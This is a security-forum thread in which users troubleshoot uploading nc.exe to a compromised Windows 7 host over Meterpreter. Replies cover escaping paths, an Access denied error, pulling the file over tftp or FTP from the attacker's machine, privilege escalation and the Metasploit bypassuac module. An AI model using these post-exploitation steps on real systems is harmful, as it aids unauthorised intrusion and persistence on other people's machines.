Results 1 to 9 of 9

Thread: upload nc.exe to Windows 7 via meterpreter? failed?

  1. #1
    Just burned their ISO
    Join Date
    Feb 2010
    Posts
    22

    Default upload nc.exe to Windows 7 via meterpreter? failed?

    Hi
    I try to to upload nc.exe to Windows 7 via meterpreter but I get This error!

    meterpreter > upload /root/Desktop/nc.exe C:\Windows\system32[*] uploading : /root/Desktop/nc.exe -> C:Windowssystem32
    [-] core_channel_open: Operation failed: The system cannot find the path specified.

    Any one know why?

    I will be thankful for answer.

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: upload nc.exe to Windows 7 via meterpreter? failed?

    Quote Originally Posted by matrix75 View Post
    Hi
    I try to to upload nc.exe to Windows 7 via meterpreter but I get This error!

    meterpreter > upload /root/Desktop/nc.exe C:\Windows\system32[*] uploading : /root/Desktop/nc.exe -> C:Windowssystem32
    [-] core_channel_open: Operation failed: The system cannot find the path specified.

    Any one know why?

    I will be thankful for answer.


    hi
    use \\

    meterpreter > sysinfo
    Computer : HACK-LAB
    OS : Windows 7 (Build 7601, Service Pack 1).
    Architecture : x64 (Current Process is WOW64)
    System Language : it_IT
    Meterpreter : x86/win32
    meterpreter > upload /root/Desktop/nc.exe C:\\Users\\d@ny-74\\Desktop[*] uploading : /root/Desktop/nc.exe -> C:\Users\d@ny-74\Desktop[*] uploaded : /root/Desktop/nc.exe -> C:\Users\d@ny-74\Desktop\nc.exe

    (i think)for system32 if you have uac enable you recieved Access-denied..................or try to look here

    http://www.backtrack-linux.org/forum...ad.php?t=51820
    bye

  3. #3
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: upload nc.exe to Windows 7 via meterpreter? failed?

    as you can see in the line
    "uploading : /root/Desktop/nc.exe -> C:Windowssystem32"
    The problem is that you're not escaping the "\" character, try
    "upload /root/Desktop/nc.exe C:\\Windows\\system32"

  4. #4
    Just burned their ISO
    Join Date
    Feb 2010
    Posts
    22

    Default Re: upload nc.exe to Windows 7 via meterpreter? failed?

    Thank you Zimaro but still like to upload to windows\\system32 ?

    meterpreter > upload "/root/Desktop/nc.exe" "C:\\Users\\Windows 7 Pro\\Desktop"[*] uploading : /root/Desktop/nc.exe -> C:\Users\Windows 7 Pro\Desktop[*] uploaded : /root/Desktop/nc.exe -> C:\Users\Windows 7 Pro\Desktop\nc.exe
    meterpreter >

    Thank youjnpa 123 butThis is still not work!is it possible to upload nc.exe to C:\\Windows\\system32 ?
    meterpreter > upload "/root/Desktop/nc.exe" "C:\\Windows\\system32"[*] uploading : /root/Desktop/nc.exe -> C:\Windows\system32
    [-] core_channel_open: Operation failed: Access is denied.
    meterpreter >

  5. #5
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: upload nc.exe to Windows 7 via meterpreter? failed?

    You can note that now you get a different error, no longer incorrect path, you now get Acces denied, probably because UAC or low privilleges user, as zimmaro mentioned you'll need UACbypass and/or privillege escalation, his video will teach one of the ways of doing it.

    Btw, nice video zimmaro, i dont know if you already know this but metasploit made things little easier for us now, exploit/windows/local/bypassuac module now supports EXE::Custom parameter.
    Last edited by jnpa123; 10-19-2012 at 11:16 AM.

  6. #6
    Just burned their ISO
    Join Date
    Mar 2011
    Posts
    11

    Default Re: upload nc.exe to Windows 7 via meterpreter? failed?

    There are multiple ways to push things to an exploited box. If you are having trouble getting metasploit to work, perhaps setup an FTP server on your system, dump nc.exe into it, and have the compromised system connect to it and pull it off that way. Its easier then it sounds, and can be quite effective. Or as suggested you can try to escalate privileges. Look for services running on the box that run with higher privileges then the user you are bonded to, and attempt to escalate to them. Once you are in a box you will find they are much more vulnerable then they were from outside. Look for common weaknesses and capitalize on them.

  7. #7
    Just burned their ISO
    Join Date
    Feb 2010
    Posts
    22

    Default Re: upload nc.exe to Windows 7 via meterpreter? failed?

    Hi
    I have two question!!
    1)tftp
    I tried to uplod nc.exe to my window 7 but still not work with tftp?why?
    Im already installed and started atftpd

    meterpreter > shell
    Process 2196 created.
    Channel 4 created.
    Microsoft Windows [Version 6.1.7600]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.


    c:\>tftp -i myIp GET nc.exe
    tftp -i myIp GET nc.exe
    'tftp' is not recognized as an internal or external command,
    operable program or batch file.


    2)bypassuac.rb
    Why bypassuac.rb not work I get error?why?

    Im copy it to meterpreter
    root@bt:/opt/metasploit/msf3/modules/exploits/windows/local# cp bypassuac.rb /opt/metasploit/msf3/scripts/meterpreter

    meterpreter > run bypassuac.rb
    [-] Error in script: NameError uninitialized constant Rex::Script::Base::Metasploit3::ExcellentRanking

    meterpreter >


    Thanks for Answers..
    Last edited by matrix75; 11-16-2012 at 02:35 PM.

  8. #8
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: upload nc.exe to Windows 7 via meterpreter? failed?

    #1 Looks like your target doesn't have a tftp client or it's not in %PATH%.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  9. #9
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: upload nc.exe to Windows 7 via meterpreter? failed?

    #2 This is not the way the module should be used, background your meterpreter session and search for the exploit/windows/local/bypassuac module set the parameters and exploit. If your target has an AV you will probably need to use the EXE::Custom parameter, and remember you need admin privileges to use this exploit.
    The bypassuac as a post module is already in the meterpreter folder but its being deprecated.

Similar Threads

  1. Replies: 2
    Last Post: 03-23-2011, 09:36 PM
  2. Meterpreter Bypass UAC Windows 7
    By runlevel0000 in forum Experts Forum
    Replies: 2
    Last Post: 01-18-2011, 07:59 AM
  3. Antimeter Tool - Anti Meterpreter (Metasploit) for Windows
    By firebits in forum Tutoriais e Howtos
    Replies: 0
    Last Post: 10-15-2010, 12:51 PM
  4. Xplico Upload Failed
    By tutuzpi in forum Beginners Forum
    Replies: 1
    Last Post: 06-07-2010, 06:37 PM
  5. Need help with windows/meterpreter/reverse_tcp
    By lifeisamalfunction in forum OLD BackTrack 4 General Support
    Replies: 1
    Last Post: 01-22-2010, 03:04 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •